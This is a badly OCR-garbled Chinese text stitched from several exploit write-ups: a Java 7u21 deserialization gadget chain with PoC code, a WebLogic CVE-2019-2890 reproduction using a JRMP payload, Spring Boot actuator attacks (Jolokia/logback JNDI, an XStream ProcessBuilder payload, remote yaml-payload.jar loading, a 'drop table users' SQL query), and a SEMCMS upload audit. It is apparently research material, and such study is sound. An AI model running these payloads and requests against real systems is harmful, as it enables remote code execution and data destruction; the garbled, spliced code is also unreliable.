A DRIE, 后 面 会 说 到 为 什么 需要 有 序 ) 
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super 就 进入 HashSet 了 ， HashSet. java : » > 内 
HashSet(int initialCapacity, float loadFactor, boolean dummy) { 
map = new LinkedHashMap<>(initialCapacity, loadFactor); 


} 





具体 是 如 何 实现 这 个 集合 的 ， 我 们 就 不 纠结 了 。 我 们 需要 通过 LinkedHashSet 连 接 writeObj 
化 与 readObject 反 序列 化 这 个 利用 链 入 口 至 *a.equals(b)* 这 个 我 们 之 前 得 到 的 触发 点 。 


先 看 LinkedHashSet 的 序列 化 与 反 序 列 化 。LinkedHashSet 获 取 的 是 LinkedHashMap 的 实例 ， 
LinkedHashMap 又 继承 自 HashSet， 所 以 最 终 的 序列 化 与 反 序列 化 就 是 在 Hashset 类 rh, 


我 们 跟着 反 序 列 化 触发 链 来 看 。 
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y payload, awriteQbject : Š 
| void t(java.io.O0bjectOut stream s) 
throws java.io.IOException { 





- s.defaultWriteObject(); 


E) By 
Obie s.writeInt(map.capacity()); 
" s.writeFloat(map.loadFactor()); 
KB, m B Frvitemap es 
H, = s.writeInt(map.size()); 


WA wel 
for (E e : map.keySet()) 
s.writeObject(e); 





ate void readObject (java j. ObyectinputStream j 
throws java.io.IOExceptiíon, ClassNotFoundException { 
EU REIS EIEN Hr TERE) 

= s.defaultReadObject(); 





| int capacity = s.readInt(); 
float loadFactor = s.readFloat(); 
map = (((HashSet)this) instanceof LinkedHashSet ? 
new LinkedHashMap<E, Object>(capacity, loadFactor) 
new HashMap<E, Object>(capacity, loadFactor)); 


mapi s As 





T int size = s.readInt(); 


// X] pg 

Ror (int i=0; i<size; i++) { 
E e = (E) s.readObject(); 
map.put(e, PRESENT); 
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IUS Ao” VALUE SAT , 
public V tí { 
if (key == null) 
return putForNullkey (value) ; 
int hash = hash(key) ; 
i = indexFor(hash, table.length); 
for (Entry«K,V» e = table[i]; e != null; e = e.next) { 


Object k; 


(e.hash == hash && ((k = e.key) == key || key.equals(k))) { 


V oldValue = e.value; 

e.value - value; 

e.recordAccess(this); 
eturn oldValue; 


modCount++; 


addEntry(hash, key, value, i); 
return null; 


我 们 专注 于 if (e.hash == hash && ((k = e.key) == key || key.equals(k))) { 这 句 
fle (e 为 前 一 个 元 素 ， key 为 当前 元 素 ) 


可 以 看 到 key.equals(k) 符合 我 们 前 面 说 到 的 a.equals(b) 的 格式 。 在 只 有 两 个 元 素 的 情 
下 ，k 为 有 序 集合 中 第 一 个 元 素 ，key 为 第 二 个 元 素 。 


即 我 们 需要 一 个 有 序 集合 (templates, proxy) 才能 满足 proxy.equals(templates) 这 一 : 
发 语句 。 


由 于 这 里 代码 (e.hash == hash && ((k = e.key) == key || key.equals(k))) 调用 第 
句 就 需要 满足 条 件 


e e.hash == hash : templates 的 hash == proxy 的 hash 

e (k = e.key) != key : templates (就 是 k) ! = proxy (就 是 key) (我 们 需要 || 左 
达 式 不 满足 ， 才 会 执行 右边 的 漏洞 触发 函数 key.equals(k)。 这 是 || 的 特性 ， 执 行 到 一 个 为 
的 ， 后 面 的 表达 式 就 不 执行 了 ) 


因为 templates 和 proxy 完 全 是 两 个 不 同 的 对 象 。 所 以 第 二 个 条 件 满足 。 
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个 条 件 需 要 nash 相 同 ， 如 果 不 是 偷 看 答案 的 小 白 (我 自己 ) 肯定 会 会 突然 僵 住 ， 特 么 这 咋 可 
， 当 场 直接 gg。 实 际 上 套路 还 是 很 深 。 看 hash 是 如 何 生成 的 “ | 


HashMap#hash 























unt hash(O 
dnt h = 
if (useAltHashing) { 
if (k instanceof String) { 
return sun.misc.Hashing.stringHash32((String) k); 


} 
h = hashSeed; 


(k))) ¢ 
h A= k. E 
4/11 
7/ Th 
// const 
7/ number col t 
h A= (h >>> 20) ^ (h >>> Nie 
return h ^ (h >>> 7) ^ (h >>> 4); 
> 
六 的 obj 有 TemplatesImpl 类 ， 但 是 这 个 类 中 没有 自 实 现 hashcode 方 法 。 
yR (进入 AnnotationlnvocationHandler 拦 截 器 实现 类 ) ，proxy.hashCode 会 先进 入 
ationlnvocationHandler 的 invoke 拦 截 器 。 〈 跟 equals 一 样 一 样 的 ， 任 何 函 数 都 会 先进 入 
{ xis 
eflect .annotation.AnnotationInvocationHandler#invoke 
的 情况 
merObject invoke(Object vari, Method var2, Object[] var3) { 
String var4 = var2.getName(); 
这 一 句 触 Class[] var5 = var2.getParameterTypes(); 


if (var4.equals(' equals") & var5.length == 1 && var5[0] == Object.class 
Tt fh") 7" Bipavl TUE 


return this.equalsImpl(var3[9]);//3Xf]Z Bi 


} else { 
assert var5.length == 0; 


= Ma E if (var4.equals("tostring")) { 
return this.toStringImpl(); 
) else if (var4.equals("hashCode")) (// 
return this.hashCodeImpl();//3tz& 





reflect .annotation.AnnotationInvocationHandlers&hashCodeImpl 
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int vari = 


7 






Entry var3; 


for(Iterator var2 = this.memberValues.entrySet().iterator(); var2.h 
var3 - (Entry)var2.next(); 



































这 边 写 的 贼 复杂 ， 改 成 简单 点 


nt vari = 0; 





Entry var3; 





























Iterator var2 = this.memberValues.entrySet().iterator(); 
for( ;var2.hasNext(); ) { 
var3 = (Entry)var2.next(); 
String key = var3.getKey(); 
Object value = var3.getValue(); 
vari += n 
key.hashCode() ^ 
memberValueHashCode(value); 








































































































return vari; 























sun.reflect.annotation.AnnotationInvocationHandler#memberValueHashCode 

















private static int } t { 
Class vari = varO.getClass(); 
if (!vari.isArray()) { 
return varO.hashCode(); 





















































我 们 的 目的 是 为 了 满足 以 下 等 式 : 





Proxy 的 hashCode = 127 * 可 控 键 的 hashcode ^ 可 控 值 的 hashcode == TemplatesImplB3 
hashCode 
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ETValues 中 map 中 键 值 对 的 值 为 我 们 的 恶意 TemplatesImpl 类 即 可 ， 接 下 来 需要 它 的 键 名 
0 de 为 0 


主将 寻找 到 一 些 神奇 的 值 比如 "fsasaeos" , "" 这 些 值 的 hashCode 为 0! ! ! 


ki 在 this.memberValues 中 赋值 键 值 对 ("f5a5a608"->TemplatesImp1 恶 意 类 ) 即 可 。 


this.membervalues 的 键 值 对 的 值 先 占 位 


以 上 代码 还 会 有 最 后 一 个 疑问 ， 为 啥 我 们 填 入 this.membervalues 的 map 要 先 试 用 override 字 符 串 来 
占 位 ， 直 接 填 入 恶意 的 攻击 类 templates 不 行 么 ? 


确实 是 不 行 的 ， 因 为 我 们 可 以 看 到 我 们 在 生成 LinkedHashSet 时 调用 了 java.util.Hashset#add 


lic sta oid main(String arg throws Exception { 


Templates templates = Gadgets.createTemplatesImpl( ys 
Map map = HashMap(); 
String magicStr = 


map.put(magicStr, ve 


final Constructor<?> ctor = Class. forName( 
ctor.setAccessible(true); 








InvocationHandler invocationHandler = (InvocationHandler) ctor.new 
Override proxy = (Override) Proxy.newProxyInstance(InvocationHandle 


HashSet set = new LinkedHashSet(); 
set.add(templates); 
set.add(proxy); 


map.put(magicStr,templates); 
ByteArrayOutputStream byteArrayOutputStream = new ByteArrayOutputStr 


ObjectOutputStream objectOutputStream = new ObjectOutputStream(byteAr 
objectOutputStream.writeObject(set); 
objectOutputStream.flush(); 
objectOutputStream.close(); 

byte[] bytes = byteArrayOutputStream.toByteArray(); ee 
ByteArrayInputStream byteArrayInputStream = new ByteArrayInputStream( 
ObjectInputStream objectInputStream = new ObjectInputStream(byteArray 
Object o = objectInputStream.readObject(); 


ic pooiean { 
return map.put(e, PRESENT)--null; 
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缠 用 了 我 们 触发 漏洞 的 孙 数 map.put0, 同 时 也 是 按照 我 们 的 漏洞 触发 顺序 去 调用 map.put， 这 会 
本 oad 会 在 我 们 本 地 触 发， 之 后 会 无 法 序列 化 成 功 (至 于 为 啥 序列 化 不 成 功 不 想 追 究 了 ! ) 








ee 


t3 
Vig 


r. newInstar 
Handler cle 


所 以 套 完美 的 利用 链 就 分 析 完 了 1! 


修复 情况 


哉 们 在 7u80 版 本 中 去 查看 AnnotationInvocationHandler 的 构造 方法 ， 会 发 现 对 于 this.type 进 行 了 校 
Im Annotation.class. 


'utStream( 


byteArra) 


AnnotationInvocationHandler(Class«? extends Annotation» vari, Map<String, Ok 
Class[] var3 = vari.getInterfaces() 
(vari.isAnnotation() && var3.length -- && var3[?] == Annotation.cle 


ream(byt 
ArrayIng 
. type = vari, 

.memberValues = var2; 


} else ( 
AnnotationFormatError( 
} 
} 
SBR ‘E t 
F 如 果 我 们 们 使 月 以 上 的 payload 去 打 7u80 版 本 的 jdk 就 会 在 反 序列 化 AnnotationlinvocationHandler 类 
ta 


国生 茧 构造 函数 的 时 候 ， 报 错 . 


| 然 构 ; 


主要 组 件 的 LinkedHashSet -> AnnotationInvocationHandler -> templatelmpl 就 因为 
AnnotationinvocationHandler 反 序 列 化 失败 而 失败 。 3 


小 结 


一 路 分 析 下 来 ， 只 能 说 这 个 利用 链 实在 是 太 骚 了 。 






从 templates.newTransformer 触 发 链 的 限制 条 件 ， 使 用 javassist 去 构造 femplates 恶 意 类 。 
析 了 _tfactory 与 版 本 问题 ，payload 位 置 static 与 构造 图 数 的 问题 ) 


再 通过 java 的 动态 代理 特性 ， 选 中 了 AnnotationInvocationHandler 这 个 拦截 器 。 


我 们 通过 AnnotationinvocationHandler 的 invoke 拦 截 实现 类 的 特性 ， 选 择 了 this.type 特 殊 构 造 : 
AnnotationlnvocationHandler 类 。 链 接 了 proxy.equals(templates) 2! Templates.newTransfor| 


再 是 通过 LinkedHashSet 类 ， 左 打通 了 序列 化 与 反 序列 化 的 入 口 点 ， 右 在 反 序列 化 恢复 集合 的 
中 存在 着 一 处 a.equals(b) 可 以 连接 proxy.equals(templates) 这 一 触发 点 。 


最 神奇 的 是 为 了 满足 到 达 触 发 点 的 要 求 ， 还 反 过 头 来 利用 AnnotationInvocationHandler 类 中 的 
invoke 方 法 中 的 hashCode 路 径 。 在 AnnotationinvocationHandler 构 造 中 寻求 了 一 处 特殊 的 
this.memberValues， 来 达成 hash(a)=hash(b) 的 驿 操作 。 


只 可 以 说 安全 研究 员 真是 大 佬 .…. 这 个 穿针引线 一 处 不 差 的 。 


虽然 说 这 条 利用 链 已 经 被 封 了 好 久 了 ， 但 是 我 们 也 可 以 意识 到 被 封杀 的 是 
AnnotationinvocationHandler 构 造 方法 处 。 


如 果 可 以 通过 其 他 途径 接 上 templates.newTransformer， 就 可 以 构筑 一 条 新 的 链 。 因 为 单单 
templates.newTransformer 是 仍然 可 以 作为 payload 执 行 的 触发 点 的 〈 比 如 7u80) o 


参考 
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splogic-T3-CVE-2019-2890-Analysis 


o 起因 


有 三 下 自己 调试 2890 的 一 些 过 程 ， 网 上 已 经 有 两 篇 公开 的 文章 了 ， 主 要 是 因为 要 写 年 会 





类 。 和 后 自己 上 手 调 了 一 下 这 个 漏洞 ， 发 现 真 的 是 个 弟 中 弟 的 漏洞 ， 感 觉 就 是 个 混 kpi 的 漏洞 。 
02 漏洞 原理 
你 构造 RRA FA readObject , 所 以 补丁 下 来 的 第 一 时 间 ， 我 全 部 反 编译 了 ， 但 是 由 于 之 前 
ansformen(y 本 古 究 过 Weblogic， 历 史 补 丁 没 怎么 留 攻 ， 如 果 通 过 diff 对 比 更 新 的 方式 会 很 快 定位 ， 所 以 只 能 反 
AE Sog f 
3 反 序列 化 的 入 口 有 StreamMessagelmpl, MarshalledObject 等 ， 而 且 修复 方式 也 是 采用 
类 中 的 lveClass 或 者 resolveProxyClass 处 增加 黑 名 单 的 校 验 的 方式 来 修复 ， 因 此 基于 这 两 点 实际 
林 的 此 很 好 定位 漏洞 位 置 : 1、 入 口 有 readObject 反 序列 化 ， 2、resolveClass 或 者 
olveProxyClass 处 有 名 单 校 验 ， 且 类 不 是 之 前 修复 过 的 类 。 
FE 述 这 两 种 情况 很 快 定位 到 了 PersistenContext 这 个 类 。 
3i 


text java ox hajwseechent/weblogié/wsee/jaxwsp« e L 
Object(ObjectinputStream objectinputStream) throws IOException, ClassNo... @ x 
utStream.readObject(); 
tream.readObiject(); 
outStream.readObject(); 
InputStream.readObject(); 
ctinputStream.readObject(); 


ingObjectinputStream)).readObject(); 














Lass WSFilteringObject InputStream 
eringObjectinput Stream 


String 


WSFilteringObjectInputStream{ InputStream inputStreom) throws IOException { 


CinputStream); 





I sc (ObjectStreamClass objectStream(lass) throws ClassNotFou 
ass lass(objectStreamC lass); 
String getName! 


osSubcloss( 


(Exception exception) { 


w InvalidClassException( “Internal Ss 


再 回头 翻 一 下 weblogic 原来 的 代码 ， 咽 确实 入 口 在 这 ， 在 readSubject 方法 中 ， 首 先 会 读 遇 六 
中 的 反 序列 化 数据 ， 然 后 调用 EncryptionUtil.decrypt 方法 进行 解密 ， 最 后 再 触发 反 序 列 个 





j ject(Objectinput$5treom objectInputStream) throws IOException, ClassNotFoundException 
nitTransients 
a” K( } CK 
(Map readObject(); 
Set reodObject() 
(Map readObject() 
- (Map) read0bject(); 


read0b ject()); 








void readSubject (Object InputStream vari) ( 
{ 
ir readInt( ); 
byte = new byte(var2]; 
readFullyCvar3); 
f € isServer()) { 
vari = decrypt(var3); 
H 
SyteArrayInputStream.vor4 = new ByteArrayInputStream(var3); 
ObjectinputStream var5 = new ObjectInputStream(var4); 
t = (AuthenticatedSubject) reodObject(); 


} catch (Exception var6) { 
.logÜnexpectedException(" Couldn't completely read PersistentContext subject", vor); 





} 





} 













因此 构造 Poc 的 时 候 ， 需 要 用 PersistenContext 这 个 类 的 writeSubject 方法 来 生成 特殊 的 序列 


化 对 象 ， 让 readSubject 方法 反 序 列 化 的 时 候 成 功 触 发 。 


0x03 漏洞 利用 


1. 导 入 jar 





EE cti 
IX 


















篇 文章 都 说 了 这 么 个 构造 思路 ， 但 是 我 阅读 学 习 的 时 候 ， 死 在 了 导入 jar 这 个 难题 下 ， 因 此 
用 的 开头 ， 我 列 出 几 个 jar 文 件 ， 测 试 环境 weblogic 10.3.6 ， 可 能 weblogic 12 jar 名 字 有 


有 ore.logging_1.9.0.0.jar 
Ihea.core management .core_2.9.0.1.jar 
Ipracle.core.weblogic.msgcat_1.2.0.0. jar 


ptoj.jar 
ssfish.jaxb_1.1.0.0_2-1-14.jar 
logic. jar 

'hint3client .jar 


| 'com.bea.core.logging. 1 .9.0.0.jar 

| com.bea.core.management.core 2.9.0.1 jar 
i com.oracle.core.weblogic.msgcat_1.2.0.0.jar 
' eryptoj.jar 

L'glassfish.jaxb. 1.1.0.0. 2-1-14.jar 

! weblogic.jar 

! wlthint3client.jar 


会 读 取 varD，、 
z 序 列 做 


ES PersistenContext2 


s 要 用 到 PersinstenContext 这 个 类 ， 因 此 序列 化 的 时 候 肯定 要 将 其 实例 化 ， 但 是 在 下 图 代码 
"t MN EM 






四 个 if 检查 的 结果 会 抛 出 com.bea.core.security.managers.NotSupportedException 的 异常 导 
序列 化 中 止 。 





) 序 列 
ic bool isKernellIdentity(AuthenticatedSubject varð) 1 
NotSupportedException(); 


e-jaxws.persistenc 


[SM ETSI 2413] ER Us 


因此 这 里 解决 办 法 就 是 绕 过 它 ， 把 它 注释 掉 。 P 


PersistentContext(GNotNull String vari, @NotNull Map<String, Serializable» var2, QNotNull se, 
(var1); 

var3 
var4; 


t var6 = getCurrentSubiject() 


é E 


subj = Varo; 
.initTransients() 


3. 改 造 writeSubject 中 的 writeObject 


原先 在 writeSubject 中 正常 写 入 的 对 象 如 下 图 所 示 。 


writeSubject(ObjectOutputStream vari) throws IOException { 
ByteArrayOutputStream var2 = 4 ByteArrayQutputStream() 
ObjectOutputStream var3 = ectOutputStream(var2) 


(Subjec 
Aüthenticatedoub 
var3.writeObject(var4) 

) ( 
var3. writebbject (t! 
n Lfd: : 


这 里 我 们 需要 将 其 替换 掉 ， 改 成 我 们 自己 恶意 对 象 ， 我 的 做 法 是 构造 恶意 的 JRMP 对 象 。 





1 writeSubject(ObjectOutputStream vari) throws IOException { 
ByteArrayOutputStream var2 = ByteArrayOutputStream():; 
ObjectOutputStream var3 = new ObjectOutputStream(var2); 


{ 

var3.writeObject(Poc, get0bject( 
(Exception e) { 

e.printStackTrace() 
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Meratic Registry ject(Stri throws. Exception { 
< E * 
int sep = command.indexOf(5°); 


String host; 


int port; 

if (sep < 0) { 
port = (new Random()).nextInt( ys 
host - command; 

} else { 


host = command.substring(®, sep); 
port = Integer.valueOf(command.substring(sep + :)); 


} 

ObjID id = new ObjID((new Random()).nextInt()); 

TCPEndpoint te = new TCPEndpoint(host, port); 

UnicastRef ref = new UnicastRef(new LiveRef(id, te, false)); 
RemoteObjectInvocationHandler obj = w RemoteObjectInvocationHandle 


Registry proxy = (Registry)Proxy.newProxyInstance(ysoserial. payloads 


return proxy; 


if (Kernelstatus.isServer()) { 
var5 = EncryptionUtil.encrypt(var5); 


SEU Kernel.isServer() 的 的 判断 。 


public static byte[] encrypt(byte[] varo) { 
return Kernel.isServer() ? getEncryptionService().encryptBytes(var0) : v 


这 里 需要 调用 kernelStatus.setIsServer(true); ， 将 状态 设置 为 true。 
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qt sid setIsServer( an varð) { 
sIsServerSet) { , 
y i 
Class. forName( 
} catch (Exception 


ew Illeg@*iStateException( 
} 
} 


isIsServerset 
/isServer = var 









当然 这 里 还 有 另 一 种 解法 ， 我 们 实际 上 可 以 直接 调用 


var5 = EncryptionUtil.getEncryptionService().encryptBytes(( [1) var5); 


但 是 有 个 小 问题 getEncryptionService 是 一 个 private 方法 ， 你 需要 重 写 一 个 把 它 变 成 public 就 可 | 
以 直接 调用 了 。 | 


var5 = EncryptionUtil.getEncryptionService().encryptBytes((byte [1) var5); 


'getEncryptionServiceQ' has private access in 'weblogic.wsee.server.EncryptionUtil' 
vari.write(var5) 





所 以 我 重 写 了 一 个 Encryptionutil , #84 getEncryptionService 设置 为 了 public 。 


v Ba weblogic.wsee.jaxws.persistence 
Lc EncryptionUtil 
© PersistentContext 


jublic static final EncryptionService getEncryptionService() { 
if (es E null) 1 
es = SerializedSystemIni.getExistingEncryptionService(); 
} 


return es; 


5. 解 决 加 密 key 的 问题 


在 weblogic.security.internal.SerializedSystemini 存在 一 个 加 密 的 key， 这 个 key 实 际 上 每 个 
weblogic 都 不 一 样 ， 所 以 官方 给 这 个 漏洞 评价 为 授权 状态 下 getshell， 也 是 和 之 前 的 T3 反 序列 化 和 
一 样 的 地 方 ， 这 里 的 解决 办 法 就 是 你 要 复 现 那个 weblogic， 就 找到 他 的 SerializedSystemini.dat 
文件 ， 并 且 在 自己 的 目录 下 创建 一 个 security 目录 ， 放 进去 就 好 了 。 


440 


e getExi st ingEncrypt fonservice( }{ 


File(vari) L 、 v / r lizedSystemIni.dat" 
rt mse tye ri : 
varð + File.separator + 

ar3); 





getSubjectManag 
t ‘tManagel SGetie neon eer | 
vars); Identity:164, SecurityManager 
rnelldentityAction ( 
sController 


S hbiipublicitgl : 


r5); 


答 这 个 类 里 面 的 getSubjectManager 方法 会 有 一 个 ceClient 的 判断 ， 如 果 为 fasle 就 不 会 直接 返 
ceSubjectManager 对 象 ， 因 此 需要 让 他 为 true 。 


SubjectManager getSubjectManager() { 
ct varð = ceSubjectManagerLock; 
(cegub fecti sr { 
(ceSubjectManager == null) { 
(ceClient) 1 
cesubDjectMamdger = SubjectManagerFactory.getInstance().getSubjectManager() ; 
ceSubjectManager 


"eptit ars} 
| AssertionError(var3); 


ceSubjectManager; 





TRAE FEBR ERK Btalse. 
E. stat 
因此 只 


Jo 


ceClient = . equalsIgnoreCase(System. getPrope 


ARE System.setProperty("com.bea.core.internal.client","true"); 让 他 过 去 即 


ninidat ; 最 后 还 是 弹 个 计算 器 吧 
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s Unb Beet Ln . total: Desk 2019-7090 


received "ME 
{+} Sending pay 
received ":3 
AS: 2048 

" 


S Link egt Lake . Vocal Deshtop/CUE -2019-2890 
& 





可 
me 4 
i tt C 
[ 
` a 
: ; 
m Me M MS 


0x04 漏洞 修复 


一 如 既往 的 老 办 法 在 resolveClass 处 增加 黑 名 单 检查 。 


NSFilter 


rCinputs 


resolve 


r 


L System Error” 
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sboot-actuators 未 授权 远程 代码 执行 


Wjue spring boot 提 供 的 服务 监控 与 管理 中 间 件 ， 默 认 配 置 会 出 现 接口 未 授权 访问 。 
泄露 网 站 流量 与 内 存 信息 ， 使 用 Jolokia 库 特性 可 以 远程 执行 任意 代码 ， 获 取 服务 器 权 


j boot 1.x 版 本 
; 的 接口 : 


Rizea (包括 堆栈 跟踪 ) 


茎 组 件 版 本 ， 根 据 组 件 版 本 可 以 尝试 找 漏洞 


y pe": "Eureka Client", "name":"com.netflix.discovery.EurekaClient", "version 


最 近 的 HTTP 日 志 ， 比 较 完 
路 径 危害 较 大 
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没什么 用 处 ， 有 很 多 时 间 ， 不 知道 具体 作用 
e /env 


o 暴露 jdk、mevan、 各 种 组 件 路 径 

o 暴露 各 种 组 件 版 本 

o 暴露 一 些 内 网 、 用 户 信息 

o post 数 据 可 对 系统 配置 进行 修改 ， 可 能 导致 远程 代码 执行 
这 个 路 径 危害 较 大 


/beans 
一 些 bean 对 应 的 config 配 置 
反正 我 觉得 没 用 (我 不 要 你 觉得 ， 我 要 我 觉得 ) 


logfile 

输出 日 志文 件 的 内 容 
/shutdown 
关闭 应 用 程序 


/mappings 
暴露 可 用 路 由 (映射 ) 
这 危害 也 比较 大 了 


/restart 


/autoconfig 
也 是 一 些 配置 设置 
危害 不 大 


/iolokia 
可 能 造成 远程 代码 执行 ， 接 下 来 具体 分 析 


/jolokia/list 


同上 


spring boot 2.x 版 本 


加 上 前 缀 : /actuator 
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，response 中 列 出 了 json 数 据 ， 该 json 数 据 中 含有 类 、 操 作 、 参 数 ， 将 json 格 式 化 
分 析 中 都 使 用 了 红 框 中 的 手法 ， 即 设置 reloadByURL 参数， 远程 获取 logback 配 置 ， 利 用 
E 程 代码 执行 


equest" :DObject{...}, 

jalue” :©{ 

“java.util. logging": S0bject{...}, 
"org.springframework.cloud.endpoint":(SObject(...], 
"Tomcat":GObjectí...7, 

| *java.nio":0bject{...}, 
“DefaultDomain":0bject{...}, 
“org.springframework.boot":@0bject{...}, 
"JMImplementation":GObjectí...), 


| "java.lang":GObjectí...7, 
"org.springframework.cloud.context.properties":(?0bject(...), 


"org.springframework.cloud.context.scope.refresh":(90bject(...), 
"com.sun.management":GObjectí(...), 
"ch.qos.logback.classic":O( 
“Name=default, Type=ch.qos.lo 
"op": 
"reloadByURL" : C4 
"args" :G[ 


urator" : 口 { 





back.classic.jmx.JMXConfig 






"name"; 
"type": 





“reloadDefaultConfiguration”:#0bject{...}, 
“reloadByFileName":@0bject{...}, 
"“getLoggerLevel":S0bject{...}, 
“getLoggerEffectiveLevel":@0bject{...}, 
"setLoggerLevel":H0bject{...} 


}, 


t 中 用 开启 ldap 服 务 端口 进行 监听 ， 并 将 Exploit 与 其 绑 定 ， 地 址 


1//127.0.0.1:1389/Exploit 
atools hhddj$ java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer http: 


9.1/sExploit 1389 
on 0.0.0.0:1389 


服务 器 ， 目录 下 含有 Exploit， 即 class 文 件 下 载 路 径 
M/127 .0.0.1/Exploit.class 
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<configuration> 
«insertFromJNDI env-entry-namez"idap://127 


«/configuration» 


访问 以 下 链接 
。 对 应 类 为 ch.qos.logback.classic.jmx.JMXConfigurator 


。 操作 为 reloadByURL 
。 BBA http:!/1/127.0.0.1!/logback.xml ， 表 示 远 程 配置 文件 地 址 





http://localhost :8090/jolokia/exec/ch.qos. logback.classic:Name=default, Ty 


结果 如 下 
hhddj:javatools hhddj$ java -cp marshalsec-6,9.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer 


//127.8.0.1/#Exploit 1389 


Listening on 0.0.0.0:1389 
Send LDAP reference result for jndi redirecting to http://127.0.0.1/Exploit.class 


为 什么 参数 斜 杠 前 要 加 吧 号 呢 ? 不 加 的 话 会 出 错 


| 代码 分 析 
e 类 ch.gos.logback.classic.jmx.JMXConfigurator 


It * PRX reloadByURL 
。 参数 http: !/1/127.0.0.1!/1ogback.xml 
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Boid reload! RL url) throws JoranException { | zi NI 


jstatusListener(statusListenerAsList); 


minfo("Resetting context: ”+ loggerContext.getName()); 


igerContext .reset(); 


Ferter a 
dStatusListener(statusListenerAsList); 


"V { 

me (url != null) { 
JoranConfigurator configurator = new JoranConfigurator(); 
configurator.setContext(loggerContext); 


|t, Type C 
configurator.doConfigure(url); 


EJ) 

"finally { 

3 removeStatusListener(statusListenerAsList); 

if (debug) { 
StatusPrinter.print(statusListenerAsList.getStatusList()); 


fServer h 


NDIAction.javam iJ FHJNDIUtil.lookup, envEntryName 
1//127.0.0.1:1389/jndi 


itryValue = JNDIUtil.lookup(ctx, envEntryName); 
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addInfo( "Context + loggerContext.getName() + " reloaded." 


itusListenerAsList statusListenerAsList = new StatusListenerAsList(); 





话说 回来 ， 为 何 参 数 斜 本 前 要 加 叹 号 呢 ， 关 键 在 以 下 代码 (人 工 调用 链 *) 


JmxRequest jmxReq = JmxRequestFactory.createGetRequest(pathinfo, getProcess 


Stack<String> elements = EscapeUtil.extractElementsFromPath(pathInfo); 


==) 


return reversePath(parsePath(pPath) ); 


==) 
383] !/ 将 其 替换 为 / ， 因 此 参数 中 要 是 含有 / 需要 在 将 其 替换 为 !/ 


public static final String PATH ESCAPE = "!"; 
public static List«String» { 
if (pPath == null || pPath.equals("") || pPath.equals("/")) { 
return null; 
} 
return replaceWildcardswithNull(split(pPath, PATH ESCAPE, "/")); 
} 


第 二 种 : 远程 代码 执行 利用 
复 现 


设置 文件 服务 器 http://127.0.0.1/xstream 
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为 : (利用 Xstream 反 序列 化 


Ws Á i * 





horn.internal.objects.NativeString» 


- 


xml.internal.bind.v2.runtime.unmarshaller.Base64Data"- 





lie class="c 


MedataSource class="com.sun.xml.internal.ws.en 





Jing.xml.XMLMessageS$XmlD: 





eis class="javax.crypto.Ci 


putStream"» 





«cipher class="javax.crypto.NullCipher"> 
«servicelIterator class="javax.im 
«iter class="javax.i 
«iter class=": 


ageio.spi.FilterIterator"» 








igeio.spi.FilterIterator'» 





java.util.CollectionsSEmptyIterator"/» 





«next class-z"java.lang.Pi 
«command» 
«string»/Applications/Calculator.app/Contents/MacOS/Calcul 
«/command» 
<redirectErrorStream>false</redirectErrorStream> 
</next> 
</iter> 
«filter class="javax. 
<method> 
<class>java.lang.ProcessBuilder</class> 
<name>start</name> 





geio. tr 





<parameter-types/> 
</method> 
<name>foo</name> 
</filter> 
<next class="string">foo</next> 
«/servicelterator» 
«lock/» 
«/cipher» 
«input class-"java.lang.ProcessBuilder$NullInputStream"/» 
<ibuffer></ibuffer> 
</is> 
</dataSource> 


dk nashorn. internal. objects. Nativestring> 
Ked-hash-set» 
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POST /env HTTP/1.1 
Host: 127.0.0.1:8090 
Content-Type: application/x-www-form-urlencoded 
Content-Length: 65 


= ” 


eureka.client.serviceUrl.defaultZone=http://127.0.0.1/xstream 


然后 再 访问 /refresh 


POST /refresh HTTP/1.1 

Host: 127.0.0.1:8090 

Content-Type: application/x-www-form-urlencoded 
Content-Length: 0 


第 三 种 : SQL 注入 利用 
执行 任意 数据 库 语 句 


GET /env HTTP/1.1 
Host: 127.0.0.1:8090 
Content-Type: application/x-www-form-urlencoded 


spring.datasource.tomcat.validationQuery = drop + table + users 


修改 jdbc 连 接 


应 用 程序 已 建立 ， 要 想 我 们 的 修改 生效 ， 可 以 修改 spring.datasource. tomcat ,max- 
active (同时 连接 数 ) ， 这 样 无 需 重启 就 可 以 修改 jdbc 连 接 


GET /env HTTP/1.1 
Host: 127.0.0.1:8090 
Content-Type: application/x-www-form-urlencoded 





spring.datasource.tomcat.url-jdbc:mysql://localhost:3306/xxx&spring.datasource: 


第 四 种 : 远程 代码 执行 


文件 服务 器 : 
http://127.0.0.1/yaml-payload.jar 


http://127.0.0.1/yaml-payload.yml 


yaml-payload.yml 中 内 容 如 下 
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x. script .ScriptEngineManager [ 
va.net.URLClassLoader [[ 
java.net .URL ["http://127.0.0.1/yaml-payload.jar"] 


yioad 的 下 载 地 址 ; 


ibub.com/artsplo 


/env HTTP/1.1 

|. 127.0.0.1:8090 

nt-Type: application/x-www-form-urlencoded 
it-Length: 59 


g.cloud. bootstrap. location=http://127.0.0.1/yam1-payload. yml 


/refresh HTTP/1.1 
.127.0.0.1:8090 


cre 


t-Type: application/x-www-form-urlencoded 


nt-Length: 0 
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SEMCMS2.6 后 台 文 件 上 传 漏洞 审计 


今天 说 的 是 semcms2.6 的 一 个 后 台 文 件 上 传 漏洞 ， 官 网 最 新 版 本 是 2.7， 但 是 2.7 这 个 版 本 也 存在 
个 间 题 。 


Semcms 主 要 提供 给 中 小 企业 的 英文 站 点 ， 问 题 出 在 Admin/SEMCMS_Upfile.php 文 件 上 。 
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体 代 码 
传 方式 ， 






-explode(". 


X 


] ["name"] 


1 777/ 获取 扩展 名 ， 


(end (Suptype) ); 
jpegigifipngidocixlsipdfirarizip|ompiicoe i!',$kuczm) 
ERES["Zile"]["size"]»1) && ($ FILES["file"][*"size"] < 30240000) ) 
_FILES["=2 le"]["error"] > 0 
"Return Code: ^? . $ FILES["file"]|"error"] “<br /»";* 
"<script language-'zavascripr'»alert(' RAM, BBM 












pecho "Upload: 
Echo "Type: " 


ho "Size: " 


| $ ELLES["file"]["name"] "nr />"3 
$F "<pg />": 


ILES["file"!|["type"] 
F 


lIi"si1356"] 





B "remp file: " . $ FILES["file"]["tmp name 
IL XETE REIS SE 
Mamageuril=$ POST["imageuri"]: 
@filed=$ rOsT["filed"];- 
3 Rdname-$ POST["filedname"]:;: 
文件 重 命名 . 
(sat inpur(S POST["wnane"])!-22"")(// 自 定义 文件 名 


+ 


/7 新 的 








Sdate = 
$n 


Srand-rand 
P ine ans "au T. 
date ("ymdhia").$rand 


ewname-$date.". 


" end(Suptypg): 
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XR 有 时间 + 随 机 数 。 
// 新 的 文件 名 。 







